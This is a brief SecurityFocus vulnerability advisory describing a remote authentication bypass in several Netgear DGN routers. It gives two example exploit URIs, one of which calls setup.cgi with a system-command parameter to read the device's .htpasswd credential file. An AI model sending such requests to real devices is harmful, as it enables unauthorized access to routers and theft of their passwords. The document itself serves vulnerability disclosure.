Multiple Netgear DGN Devices Remote Authentication Bypass Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/setup.cgi?currentsetting.htm=1

http://www.example.com/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat+/www/.htpasswd&curpath=/&currentsetting.htm=1


 

Privacy Statement
Copyright 2010, SecurityFocus